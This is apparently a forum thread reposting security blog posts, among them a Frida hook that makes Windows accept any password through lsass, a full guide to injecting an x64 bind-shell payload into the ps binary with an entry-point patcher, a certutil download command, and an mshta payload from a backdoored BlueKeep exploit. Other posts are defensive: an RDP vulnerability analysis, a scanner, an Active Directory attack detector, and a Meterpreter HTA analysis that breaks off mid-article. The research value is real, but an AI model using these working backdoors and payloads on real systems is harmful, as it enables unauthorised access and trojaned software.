    I investigated the five backtraces and found two function names that were immediately interesting: the first being MsvValidateTarget and the second MsvpPasswordValidate. MsvValidateTarget was being called right after MsvSamValidate, which may explain why my initial hooking attempts failed, as there may be more processing happening there. MsvpPasswordValidate was being called in the fourth invocation of RtlCompareMemory, which was the call that compared two MD4 hashes when authenticating interactively, as previously discussed. At this stage I Googled the MsvpPasswordValidate function, only to find out that this method is well known for password backdoors! In fact, it’s the same method used by Inception for authentication bypasses. Awesome, I may be on the right track after all. I couldn’t quickly find a function prototype for MsvpPasswordValidate online, but a quick look in IDA Free hinted towards the fact that MsvpPasswordValidate may expect seven arguments. I figured now would be a good time to hook those, and log the return value.

    • Screenshot: MsvpPasswordValidate argument and return value dump

    Using runas /user:user cmd from a command prompt and providing the correct password for the account, MsvpPasswordValidate would return 0x1, whereas providing an incorrect password would return 0x0. Seems easy enough? I modified the existing hook to simply change the return value of MsvpPasswordValidate to always be 0x1. Doing this, I was able to authenticate using any password for any valid user account, even when using network authentication!

    • Screenshot: Successful authentication, with any password for a valid user account
    // from: https://github.com/sensepost/frida-windows-playground/blob/master/MsvpPasswordValidate_backdoor.js
    
    const MsvpPasswordValidate = Module.getExportByName(null, 'MsvpPasswordValidate');
    console.log('MsvpPasswordValidate @ ' + MsvpPasswordValidate);
    
    Interceptor.attach(MsvpPasswordValidate, {
      onLeave: function (retval) {
        retval.replace(0x1);
      }
    });

    creating standalone Frida executables

    The hooks we have built so far depend heavily on the Frida Python modules. This is not something you would necessarily have available on an arbitrary Windows target, making the practicality of using this rather complicated. We could use something like py2exe, but that comes with its own set of bloat and things to avoid. Instead, we could build a standalone executable in C that bypasses the need for a Python runtime entirely.

    The main Frida source repository contains some example code for those that want to make use of the lower level bindings here. When choosing to go down this path, you will need to decide between two types of C bindings; the one that includes the V8 JavaScript engine (frida-core/frida-gumjs), and one that does not (frida-gum). When using frida-gum, instrumentation needs to be implemented using a C API, skipping the JavaScript engine layer entirely. This has obvious wins when it comes to overall binary size, but increases the implementation complexity a little bit. Using frida-core, we can simply reuse the JavaScript hook we have already written, embedding it in an executable. But we will be packaging the V8 engine with our executable, which is not great from a size perspective.

    A complete example of using frida-core is available here, and that is what I used as a template. The only thing I changed was how a target process ID was determined. The original code accepted a process ID as an argument, but I changed that to determine it using frida_device_get_process_by_name_sync, providing lsass.exe as the name of the process I was interested in. The definition for this function lives in frida-core.h, which you can get as part of the frida-core devkit download. Next, I embedded the MsvpPasswordValidate bypass hook and compiled the project using Visual Studio Community 2017. The result? A beefy 44MB executable that would now work regardless of the status of a Python installation. Maybe py2exe wasn’t such a bad idea after all…

    • Screenshot: Passback binary, in all of its 44MB glory, injected into lsass.exe to allow for local authentication using any password

    Some work could be done to optimise the overall size of the resultant executable, but this would involve rebuilding the frida-core devkit from source and stripping the pieces we won’t need. An exercise left for the reader, or for me, for another day. If you are interested in building this yourself, have a look at the source code repository for passback here, opening it in Visual Studio 2017 and hitting “build”.

    summary

    If you got here, you saw how it was possible to recreate two well-known password backdoors on Windows based computers using Frida. The real world merits of where this may be useful may be small, but I believe the journey getting there is what was important. A Github repository with all of the code samples used in this post is available here.

     

    Source: https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frida/

  9. Windows Insight: The TPM

    The Windows Insight repository currently hosts three articles on the TPM (Trusted Platform Module):

    • The TPM: Communication Interfaces (Aleksandar Milenkoski): In this work, we discuss how the different components of the Windows 10 operating system deployed in user-land and in kernel-land, use the TPM. We focus on the communication interfaces between Windows 10 and the TPM. In addition, we discuss the construction of TPM usage profiles, that is, information on system entities communicating with the TPM as well as on communication patterns and frequencies;
    • The TPM: Integrity Measurement (Aleksandar Milenkoski): In this work, we discuss the integrity measurement mechanism of Windows 10 and the role that the TPM plays as part of it. This mechanism, among other things, implements the production of measurement data. This involves calculation of hashes of relevant executable files or of code sequences at every system startup. It also involves the storage of these hashes and relevant related data in log files for later analysis;

     

    • The TPM: Workflow of the Manual and Automatic TPM Provisioning Processes (Aleksandar Milenkoski): In this work, we describe the implementation of the TPM provisioning process in Windows 10. We first define the term TPM provisioning in order to set the scope of this work. Under TPM provisioning, we understand activities storing data in the TPM device, where the stored data is a requirement for the device to be used. This includes: authorization values, the Endorsement Key (EK), and the Storage Root Key (SRK).

     

    – Aleksandar Milenkoski

     

    Source: https://insinuator.net/2019/05/windows-insight-the-tpm/

  10.  

    In this talk we will explore how file formats can be abused to target the security of an end user or server, without harming a CPU register or the memory layout, with a focus on the OpenDocument file format. At first, a short introduction to file format bug hunting will be given, based on my own approach. This will cover my latest Adobe PDF Reader finding and will lead up to my discovery of a remote code execution in LibreOffice. It shows how a simple path traversal issue allowed me to abuse the macro feature to execute a Python script installed by LibreOffice and abuse it to execute any local program with parameters, without any prompt. Additionally, other supported scripting languages in LibreOffice will be explored, as well as other interesting features and differences from OpenOffice. As software like ImageMagick uses LibreOffice for file conversion, potential security issues on the server side will be explained as well. This focuses on certain problems and limitations an attacker has to work with regarding macro support and other threats like polyglot files or local file path information. Lastly, the potential threats will be summed up to raise awareness regarding any support for file formats and what precautions should be taken.

    About Alex Inführ

    As a Senior Penetration Tester with Cure53, Alex is an expert on browser security and PDF security. His cardinal skillset relates to spotting and abusing ways for uncommon script execution in MSIE, Firefox and Chrome. Alex's additional research foci revolve around SVG security and Adobe products used in the web context. He has worked with Cure53 for multiple years with a focus on web security, JavaScript sandboxes and file format issues. He presented his research at conferences like AppSec Amsterdam, AppSec Belfast, ITSecX and multiple OWASP chapters. As part of his research as a co-author of the 'Cure53 Browser Security White Paper', sponsored by Google, he investigated the security of browser extensions.

    About Security Fest 2019

    May 23rd - 24th 2019. This summer, Gothenburg will become the most secure city in Sweden! We'll have two days filled with great talks by internationally renowned speakers on some of the most cutting-edge and interesting topics in IT security! Our attendees will learn from the best and the brightest, and have a chance to get to know each other during the lunch, dinner, after-party and scheduled breaks. Please note that you have to be at least 18 years old to attend.

    Highlights of Security Fest: interesting IT-security talks by renowned speakers, lunch and dinner included, a great CTF with nice prizes, and an awesome party!

    Venue: Security Fest is held in Eriksbergshallen in Gothenburg, with an industrial decor from the time it was used as a mechanical workshop. Right next to the venue, you can stay at Quality Hotel 11.

  11. RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

     

    During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP and several other operating systems, which have not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

    According to the advisory, the issue discovered was serious enough that it led to Remote Code Execution and was wormable, meaning it could spread automatically on unprotected systems. The bulletin referenced well-known network worm “WannaCry” which was heavily exploited just a couple of months after Microsoft released MS17-010 as a patch for the related vulnerability in March 2017. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario and we are urging those with unpatched and affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely malicious actors have weaponized this bug and exploitation attempts will likely be observed in the wild in the very near future.

     

    Vulnerable Operating Systems:

    • Windows 2003
    • Windows XP
    • Windows 7
    • Windows Server 2008
    • Windows Server 2008 R2

     

    Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

    The Remote Desktop Protocol (RDP) enables connection between a client and endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1, but due to limitations on the number of channels, Dynamic Virtual Channels (DVCs) were later defined, contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs, which are created and torn down on demand.

    It’s this 32-SVC binding which the CVE-2019-0708 patch fixes within the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions in the RDP driver termdd.sys. As can be seen in figure 1, in the RDP Connection Sequence, connections are initiated and channels set up prior to Security Commencement, which enables CVE-2019-0708 to be wormable, since it can self-propagate over the network once it discovers open port 3389.

     


    Figure 1: RDP Protocol Sequence

     

    The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

    Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

     


    Figure 2: Standard GCC Conference Initialization Sequence

     

    However, during GCC Conference Initialization, the client supplies the channel name, which is not whitelisted by the server, meaning an attacker can set up another SVC named “MS_T120” on a channel other than 31. It’s the use of MS_T120 on a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).
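The detection logic this implies can be sketched in a few lines. The helper below is hypothetical (it operates on an already-parsed list of channel definitions, not a real RDP/GCC parser), flagging any request that binds “MS_T120” to an index other than 31:

```python
def suspicious_channel_bindings(channel_requests):
    """channel_requests: list of (name, index) tuples, assumed to be parsed
    from the client's channel definitions in a GCC Conference Create Request.
    Flags any request binding the internal MS_T120 channel to an index other
    than 31 - the pattern CVE-2019-0708 exploitation relies on."""
    return [
        (name, index)
        for name, index in channel_requests
        # Channel names on the wire are null-padded, hence the rstrip
        if name.rstrip("\x00").upper() == "MS_T120" and index != 31
    ]

# Example mirroring Figure 3: MS_T120 requested on channel number 4
requests = [("rdpdr", 0), ("cliprdr", 1), ("MS_T120", 4)]
print(suspicious_channel_bindings(requests))  # [('MS_T120', 4)]
```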

    Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence with “MS_T120” channel on channel number 4.

     


    Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel

     

    The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

     


    Figure 4: Windows Kernel and User Components

     

    The Microsoft patch, as shown in figure 5, now adds a check for a client connection request using channel name “MS_T120” and ensures it binds to channel 31 (1Fh) only, in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.

     


    Figure 5: Microsoft Patch Adding Channel Binding Check

     

    After we investigated the patch applied to both Windows 2003 and XP and understood how the RDP protocol was parsed before and after patching, we decided to create a Proof-of-Concept (PoC) that would use the vulnerability to remotely execute code on a victim’s machine and launch the calculator application, a well-known litmus test for remote code execution.

     


    Figure 6: Screenshot of our PoC executing

     

    For our setup, RDP was running on the machine and we confirmed we had the unpatched versions running on the test setup. The result of our exploit can be viewed in the following video:

     

     

    There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit is working and that it is possible to remotely execute code on a vulnerable system without authentication. Network Level Authentication should be effective to stop this exploit if enabled; however, if an attacker has credentials, they will bypass this step.

    As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.

     

    Recommendations:

    • We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.
    • Disable RDP from outside of your network and limit it internally; disable entirely if not needed. The exploit is not successful when RDP is disabled.
    • Client requests with “MS_T120” on any channel other than 31 during GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence for legitimate use case.

     

    It is important to note as well that the RDP default port can be changed in a registry field, and after a reboot RDP will be tied to the newly specified port. From a detection standpoint this is highly relevant.

     


    Figure 7: RDP default port can be modified in the registry

     

    Malware or administrators inside of a corporation can change this with admin rights (or with a program that bypasses UAC) and write this new port in the registry; if the system is not patched the vulnerability will still be exploitable over the unique port.

     

    McAfee Customers:

    McAfee NSP customers are protected via the following signature released on 5/21/2019:

    0x47900c00 “RDP: Microsoft Remote Desktop MS_T120 Channel Bind Attempt”

    If you have any questions, please contact McAfee Technical Support.

     

    Source: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/

  12. CVE-2019-0708

    CVE-2019-0708 "BlueKeep" Scanner PoC by @JaGoTu and @zerosum0x0.

    CVE-2019-0708 Scanner

    In this repo

    A scanner fork of rdesktop that can detect if a host is vulnerable to CVE-2019-0708 Microsoft Windows Remote Desktop Services Remote Code Execution vulnerability. It shouldn't cause denial-of-service, but there is never a 100% guarantee across all vulnerable versions of the RDP stack over the years. The code has only been tested on Linux and may not work in other environments (BSD/OS X), and requires the standard X11 GUI to be running (though the RDP window is hidden for convenience).

    There is also a Metasploit module, which is a current work in progress (MSF does not have an RDP library).

    Building

    There is a pre-made rdesktop binary in the repo, but the steps to building from source are as follows:

    git clone https://github.com/zerosum0x0/CVE-2019-0708.git
    cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
    ./bootstrap
    ./configure --disable-credssp --disable-smartcard
    make
    ./rdesktop 192.168.1.7:3389
    

    Please refer to the normal rdesktop compilation instructions.

    Is this dangerous?

    Small details of the vulnerability have already begun to reach mainstream. This tool does not grant attackers a free ride to a theoretical RCE.

    Modifying this PoC to trigger the denial-of-service does lower the bar of entry but will also require some amount of effort. We currently offer no explanation of how this scanner works other than to tell the user it seems to be accurate in testing and follows a logical path.

    System administrators need tools like this to discover vulnerable hosts. This tool is offered for legal purposes only and to forward the security community's understanding of this vulnerability. As it does exploit the vulnerability, do not use against targets without prior permission.

    License

    rdesktop fork is licensed as GPLv3.

    Metasploit module is licensed as Apache 2.0.

     

    Source: https://github.com/zerosum0x0/CVE-2019-0708

  13. Why?

    I needed a simple and reliable way to delete Facebook posts. There are third-party apps that claim to do this, but they all require handing over your credentials, or are unreliable in other ways. Since this uses Selenium, it is more reliable, as it uses your real web browser, and it is less likely Facebook will block or throttle you.

    As for why you would want to do this in the first place. That is up to you. Personally I wanted a way to delete most of my content on Facebook without deleting my account.

    Will this really delete posts?

    I can make no guarantees that Facebook doesn't store the data somewhere forever in cold storage. However this tool is intended more as a way to clean up your online presence and not have to worry about what you wrote from years ago. Personally, I did this so I would feel less attached to my Facebook profile (and hence feel the need to use it less).

    How To Use

    • Make sure that you have Google Chrome installed and that it is up to date, as well as the chromedriver for Selenium. See here. On Arch Linux you can find this in the chromium package, but it will vary by OS.
    • pip3 install --user delete-facebook-posts
    • deletefb -E "youremail@example.org" -P "yourfacebookpassword" -U "https://www.facebook.com/your.profile.url"
    • The script will log into your Facebook account, go to your profile page, and start deleting posts. If it cannot delete something, then it will "hide" it from your timeline instead.
    • Be patient as it will take a very long time, but it will eventually clear everything. You may safely minimize the chrome window without breaking it.

    How To Install Python

    MacOS

    See this link for instructions on installing with Brew.

    Linux

    Use your native package manager

    Windows

    See this link, but I make no guarantees that Selenium will actually work as I have not tested it.

    Bugs

    If it stops working or otherwise crashes, delete the latest post manually and start it again after waiting a minute. I make no guarantees that it will work perfectly for every profile. Please file an issue if you run into any problems.

     

    Source: https://github.com/weskerfoot/DeleteFB

    Android (@Android) on Twitter:

    For Huawei users' questions regarding our steps to comply w/ the recent US government actions: We assure you while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.

     

    Via: https://www.gadget.ro/care-sunt-implicatiile-pentru-cei-ce-folosesc-un-smartphone-huawei/

Do not run "public" RDP exploits, they are backdoored.

     

Edit: The PoC you will find executes this on your computer (Windows only):

     

    mshta vbscript:msgbox("you play basketball like caixukun!",64,"K8gege:")(window.close)

     

    • Upvote 1
  16. Real-time detection of high-risk attacks leveraging Kerberos and SMB

This is a real-time detection tool for attacks against Active Directory. It is an improved version of the previous release and is useful for immediate incident response to targeted attacks.

    The tool detects the following attack activities using Event logs and Kerberos/SMB packets.

    • Attacks leveraging the vulnerabilities fixed in MS14-068 and MS17-010
    • Attacks using Golden Ticket
    • Attacks using Silver Ticket

    Overview of the tool

    The tool is tested in Windows 2008 R2, 2012 R2, 2016. Documentation of the tool is here

    Tool detail

    Function of the tool

    Our tool consists of the following components:

• Detection Server: Detects attack activities leveraging Domain Administrator privileges using signature-based detection and machine learning. The detection programs are implemented as a Web API.
• Log Server for Event Logs: Implemented using the Elastic Stack. It collects the Domain Controller's Event Logs in real time and provides log search and visualization.
• Log Server for packets: Collects Kerberos packets using tshark. Collected packets are sent to Elasticsearch using Logstash.

    Our method consists of the following functions.

    • Event Log analysis
    • Packet analysis
    • Identification of tactics in ATT&CK

    Event Log analysis

1. When someone accesses the Domain Controller (legitimately or as part of an attack), the activity is recorded in the Event Log.
2. Each Event Log entry is sent to Logstash in real time by Winlogbeat.
  Logstash extracts the input data from the Event Log, then calls the detection API on the Detection Server.
3. The detection API is launched. First, the log is analyzed with signature-based detection.
4. Next, the log is analyzed with machine learning.
5. If an attack is detected, the log is judged to have been recorded by attack activity.
  An alert e-mail is sent to the security administrator, and a flag indicating an attack is added to the log.
6. The log is transferred to Elasticsearch.
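Steps 3-6 above can be sketched as a minimal detection routine. This is purely illustrative: the field names, the signature rule, and the `detect` function are my own assumptions, not the tool's real API.

```python
# Hypothetical sketch of steps 3-6; event fields and rules are invented.
MONITORED_EVENT_IDS = {4672, 4674, 4688, 4768, 4769, 5140}

def signature_check(event):
    # Example rule: a TGT request (4768) using RC4 (0x17) ticket encryption
    return event.get("event_id") == 4768 and event.get("ticket_encryption") == "0x17"

def ml_check(event):
    return False  # placeholder for the scikit-learn scoring step

def detect(event):
    if event.get("event_id") in MONITORED_EVENT_IDS and \
            (signature_check(event) or ml_check(event)):
        event["attack"] = True  # flag added before shipping to Elasticsearch
    return event

print(detect({"event_id": 4768, "ticket_encryption": "0x17"}))
# the returned log entry now carries the "attack": True flag
```

In the real tool this logic sits behind the Flask Web API on the Detection Server, called by a Logstash pipeline.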

Input of the tool: Event Logs of the Domain Controller.

    • 4672: An account assigned with special privileges logged on.
    • 4674: An operation was attempted on a privileged object
    • 4688: A new process was created
    • 4768: A Kerberos authentication ticket (TGT) was requested
    • 4769: A Kerberos service ticket was requested
    • 5140: A network share object was accessed

    Packet analysis

1. When someone accesses the Domain Controller (legitimately or as part of an attack), Kerberos packets are sent to the Domain Controller.
2. Tshark collects the Kerberos packets.
  Logstash extracts the input data from the packets, then calls the detection API on the Detection Server.
3. The detection API is launched. The packets are analyzed to determine whether Golden Tickets or Silver Tickets are being used.
4. If an attack is detected, the packet is judged to have been recorded by attack activity.
  An alert e-mail is sent to the security administrator, and a flag indicating an attack is added to the packet.
5. The packet is transferred to Elasticsearch.

Input of the tool: Kerberos packets

    The following is the Kerberos message type used for detection.

    • 11: KRB_AS_REP
    • 12: KRB_TGS_REQ
    • 13: KRB_TGS_REP
    • 14: KRB_AP_REQ
    • 32: KRB_AP_ERR_TKT_EXPIRED
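As an illustration of how these message types can be used, here is a toy heuristic (my own sketch, not the tool's actual detection logic): a TGS-REQ from a client that was never observed receiving an AS-REP suggests a forged TGT, i.e. a Golden Ticket.

```python
# Illustrative heuristic only -- not the tool's real detection logic.
KRB_MSG = {11: "KRB_AS_REP", 12: "KRB_TGS_REQ", 13: "KRB_TGS_REP",
           14: "KRB_AP_REQ", 32: "KRB_AP_ERR_TKT_EXPIRED"}

seen_as_rep = set()  # clients that legitimately received a TGT from the KDC

def inspect(packet):
    mtype, client = packet["msg_type"], packet["client"]
    if mtype == 11:              # KRB_AS_REP: the KDC issued a real TGT
        seen_as_rep.add(client)
    if mtype == 12 and client not in seen_as_rep:
        return "possible Golden Ticket"  # TGS-REQ without any recorded AS-REP
    return KRB_MSG.get(mtype, "other")

print(inspect({"msg_type": 12, "client": "victim$"}))  # -> possible Golden Ticket
```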

    Output (result) of the tool

• Distinguishes logs recorded by attack activities from logs recorded by normal operations, and identifies infected computers and accounts.
  The detection results can be checked using Kibana.
    • If attacks are detected, send email alerts to the specific E-mail address.

    System Requirements

    We tested our tool in the following environment.

    • Domain Controller (Windows 2008R2/ 2012 R2/ 2016)
      • Winlogbeat(5.4.2): Open-source log analysis platform
    • Log Server for Event Logs: Open-source tools + Logstash pipeline
      • OS: CentOS 7
      • Logstash(6.5.0): Parse logs, launch the detection program, transfer logs to Elastic Search
      • Elastic Search(6.5.0): Collects logs and provides API interface for log detection
      • Kibana(6.5.0): Visualizes the detection results
    • Log Server for packet analysis: Open-source tools + Logstash pipeline
      • OS: CentOS 7
      • Logstash(6.5.0): Parse logs, launch the detection program, transfer logs to Elastic Search
      • tshark: Collect and save packets
    • Detection Server: Custom detection programs
      • OS: CentOS 7
      • Python: 3.6.0
      • Flask: 0.12
      • scikit-learn: 0.19.1

    How to implement

    See implementation method

     

    Sursa: https://github.com/sisoc-tokyo/Real-timeDetectionAD_ver2

    • Upvote 1
  17. Injecting shellcode into x64 ELF binaries

     
    by matteo_malvica May 18, 2019

    Index

    Intro

    Recently, I have decided to tackle another challenge from the Practical Binary Analysis book, which is the latest one from Chapter 7.

    It asks the reader to create a parasite binary from a legitimate one. I have picked ps, the process snapshot utility, where I have implanted a bind-shell as a child process.

    Inspecting the target

Let’s start our ride by creating a copy of the original executable (it can be any executable) in our working folder.

    $ cp /bin/ps ps_teo
    

    And take note of the original entry point.

    $ readelf -h ps_teo
    ELF Header:
    ...
      Entry point address:               0x402f10
    ...
    

We will be replacing the original entry point with the address of our malicious section and restoring normal execution after the shellcode has done its job. But before jumping to that, we should plan our shellcode.
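The entry point can also be extracted programmatically. Here is a small stdlib-only sketch: in the ELF64 header, e_entry is the 8-byte little-endian field at offset 24 (the same field readelf printed above).

```python
import struct

def elf64_entry(header_bytes):
    # e_entry: 8-byte little-endian field at offset 24 of the ELF64 header
    return struct.unpack_from("<Q", header_bytes, 24)[0]

# e.g.: with open("ps_teo", "rb") as f: print(hex(elf64_entry(f.read(64))))
```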

    Shellcoding our way out

We said we want a bind shell, right? Here is a modified version of a standard x64 bind shell, where we make use of the fork system call to spawn a child process.

    BITS 64
    
    SECTION .text
    global main
    
    section .text
    
    main:
      push rax         ; save all clobbered registers
      push rcx               
      push rdx
      push rsi
      push rdi
      push r11
    
      ;fork
      xor rax,rax
      add rax,57
      syscall
      cmp eax, 0
      jz child
    
    parent:
      pop r11          ; restore all registers
      pop rdi
      pop rsi
      pop rdx
      pop rcx
      pop rax
    
      push 0x402f10    ; jump to original entry point
      ret
    
    child:  
      ; socket
      xor eax,eax
      xor ebx,ebx
      xor edx,edx
      ;socket
      mov al,0x1
      mov esi,eax
      inc al
      mov edi,eax
      mov dl,0x6
      mov al,0x29      ; sys_socket (syscall 41)
      syscall
    
      xchg ebx,eax
    
      ; bind
      xor  rax,rax
      push   rax
  push 0x39300102  ; port 12345 (0x3039 in network byte order)
      mov  [rsp+1],al
      mov  rsi,rsp
      mov  dl,16
      mov  edi,ebx
      mov  al,0x31     ; sys_bind (syscall 49)
      syscall
    
      ;listen
      mov  al,0x5
      mov esi,eax
      mov  edi,ebx
      mov  al,0x32     ; sys_listen (syscall 50)
      syscall
    
      ;accept
      xor edx,edx
      xor esi,esi
      mov edi,ebx
      mov al,0x2b      ; sys_accept (43)
      syscall
      mov edi,eax      ; store socket
    
      ;dup2
      xor rax,rax
      mov esi,eax
      mov al,0x21      ; sys_dup2 (syscall 33)
      syscall
      inc al
      mov esi,eax
      mov al,0x21
      syscall
      inc al
      mov esi,eax
      mov al,0x21
      syscall
    
      ;exec
      xor rdx,rdx
      mov rbx,0x68732f6e69622fff
      shr rbx,0x8
      push rbx
      mov rdi,rsp
      xor rax,rax
      push rax
      push rdi
      mov  rsi,rsp
      mov al,0x3b      ; sys_execve (59)
      syscall
      call exit
    
    exit:
  xor     edi,edi  ; exit code 0
  mov     eax,60   ; sys_exit (syscall 60)
  syscall          ; x64 uses syscall, not int 0x80
    
    

We start by saving all clobbered registers and forking: the child runs the bind shell, while the parent restores the registers and returns execution to the original entry point. Let’s now create a raw binary from this NASM file, which will be used by our injection process later on.

    nasm -f bin -o bind_shell.bin bind_shell.s
    

    ELF-Inject

Our very next step is to inject the bind shell into the ps ELF using elfinject, a tool which is available from the book's source code.

    ./elfinject ps_teo bind_shell.bin ".injected" 0x800000 -1
    

    If we inspect the binary once more, we can notice the new .injected section around location 0x800000

    $ readelf --wide --headers ps_teo  | grep injected
      [27] .injected         PROGBITS        0000000000800c80 017c80 0000b0 00  AX  0   0 16
    

Guess what? The value 800c80 is going to be our new entry point.
I wrote a quick and dirty script that patches the entry point on the fly.

import struct
import sys

# usage: ep_patcher.py <filename> <new_entrypoint_hex>
patch_file_input = sys.argv[1]
new_ep = struct.pack('<Q', int(sys.argv[2], 16))

with open(patch_file_input, 'rb+') as f:
    # e_entry is an 8-byte little-endian field at offset 24 of the ELF64 header
    f.seek(24)
    f.write(new_ep)
    

    We can test it and. . .

    python patcher.py ps_teo 800c80
    

    . . .we can verify that the new entry point has been modified correctly:

    $ readelf  -h ps_teo
    ELF Header:
    ...
      Entry point address:               0x800c80
    ...
    

After running the injected version of ps, we can notice a new listening socket on port 12345:

    $ netstat -antulp | grep 12345
    tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN      6898/ps_teo
    

    Which leads to the expected backdoor:

    $ nc localhost 12345
    id
    uid=1000(binary) gid=1000(binary) groups=1000(binary),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
    
    whoami
    binary
    

    Extra stealthiness

If we wanted to hide from ps or top, we could go even further and revise the whole shellcode to make it alter the /proc/ filesystem, like this or that one.

     

    Sursa: https://www.matteomalvica.com/blog/2019/05/18/elf-injection/

    • Upvote 1
  18. Congratulations, You’ve Won a Meterpreter Shell

    Posted by Josh Stroschein, Ratnesh Pandey and Alex Holland.

    For an attack to succeed undetected, attackers need to limit the creation of file and network artifacts by their malware. In this post, we analyse an attack that illustrates two popular tactics to evade detection:

    1. Avoiding saving file artifacts to disk by running malicious code directly in memory. These have been described as “fileless” attacks.[1]
    2. Using legitimate programs built into an operating system to perform or facilitate malicious functionality, such as code execution, persistence, lateral movement and command and control (C2). The abuse of these programs is known as “living-off-the-land”.[2]

    Our attack began with a user clicking on a hyperlink that took them to a website hosting a malicious HTA (HTML Application) file. The HTA file led to the execution of two stages of shellcode that ultimately resulted in a Meterpreter reverse HTTP shell session being established with a C2 server. The attack was successfully contained, however, because Bromium Secure Platform (BSP) isolates risky activities such as opening a web page within a micro-virtual machine. Consequently, the attacker was unable to gain a foothold in the network.

    Although the use of HTA files is a well-understood technique to execute malicious code,[3] we thought this attack was worth exploring because of the steps the attacker took to reduce the footprint of the attack. These included executing multiple stages of shellcode directly in memory, applying information gained from reconnaissance of the target to disguise the attacker’s network traffic, and the use of living-off-the-land binaries.

    It begins with an HTA file

    After clicking the hyperlink, the target is prompted to save a file named sweepstakeApp.hta to disk. If the site is visited using Internet Explorer the target is prompted to run or save the file from their web browser (figure 1). This is significant because HTA files can only be opened directly from Internet Explorer or from Windows Explorer using Microsoft HTML Application Host (mshta.exe), but not from other web browsers. The decision to use an HTA file as the vector to execute the attacker’s code suggests a level of knowledge about how the targeted host was configured, such as the default web browser in use. HTA files allow developers to use the functionality of Internet Explorer’s engine, including its support for scripting languages such as VBScript and JavaScript, without its user interface and security features.[4]

    internet_explorer_hta_prompt.pngFigure 1 – Prompt to open or save malicious HTA file in Internet Explorer.

    The downloaded HTA file contains obfuscated VBScript code, as shown in figure 2. On execution, it launches two commands using powershell.exe and cmd.exe by instantiating a WScript.Shell object that enables scripts to interact with parts of the Windows shell. Meanwhile the user is shown a pop-up window with the supposed results of a gift card sweepstake (figure 3).

    hta_obfuscated_vbscript.pngFigure 2 – Obfuscated VBScript code in the HTA file.

    decoy_hta_pop_up.pngFigure 3 – Pop-up presenting the decoy application to the user.

    The first command downloads an obfuscated PowerShell command from a URL using PowerShell’s WebClient.DownloadString method and then executes it in memory using the alias of the Invoke-Expression cmdlet, IEX.

    powershell_001.pngFigure 4 – PowerShell command that downloads and runs an obfuscated script in memory.

    powershell_002.pngFigure 5 – Obfuscated command downloaded using PowerShell.

    Verifying the first stage of the infection

    The second command launches a cmd.exe process which then runs certutil.exe, another program built into Windows which is used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally:

    certutil.exe -urlcache -split -f [URL] DestinationFile

    In this case, however, the provided URL parameter was generated using %USERDOMAIN% and %USERNAME% environment variables on the target system and the destination file is called “null”.

    powershell_003.pngFigure 6 – Certutil command to inform adversary of successful running of HTA file.

    Navigating to the URL returns an HTTP 404 status code. Therefore, instead of downloading a file, this command is used to notify the attacker that the HTA file has successfully executed by sending a GET request to a web server controlled by the attacker containing the username and domain of the target host. The attacker can simply monitor their web server logs to determine which users successfully ran the HTA file.
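To illustrate that last point, here is a hypothetical sketch of how the attacker could mine their web server access log for these beacons; the log line format and the helper function are invented for the example, since the path embeds the %USERDOMAIN% and %USERNAME% values.

```python
import re

# Made-up access-log line: the requested path carries DOMAIN/USERNAME.
LOG_LINE = '10.0.0.5 - - [28/Jan/2019] "GET /CORP/jsmith HTTP/1.1" 404 -'

def extract_victims(line):
    # Pull the two path components out of the GET request, if present.
    m = re.search(r'"GET /([^/\s]+)/([^/\s"]+) HTTP', line)
    return (m.group(1), m.group(2)) if m else None

print(extract_victims(LOG_LINE))  # -> ('CORP', 'jsmith')
```

The 404 response is irrelevant to the attacker: the request itself, recorded in the log, is the signal.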

    Analysis of the obfuscated PowerShell command

The command downloaded by PowerShell contains a compressed, Base64-encoded string. After decoding and decompressing the string, it reveals another PowerShell command, shown in figure 7.

    powershell_004.pngFigure 7 – Deobfuscated PowerShell command.

    The command in figure 7 contains an obfuscated string. First, the string is decoded from Base64. The result is then converted into a byte array and stored in a variable called $var_code. Finally, the script enters a For loop that iterates through the byte array and performs a bitwise XOR operation on each byte with a hard-coded value of 35 (base 10).

    xor.pngFigure 8 – For loop performing bitwise XOR operations on the byte array in $var_code.

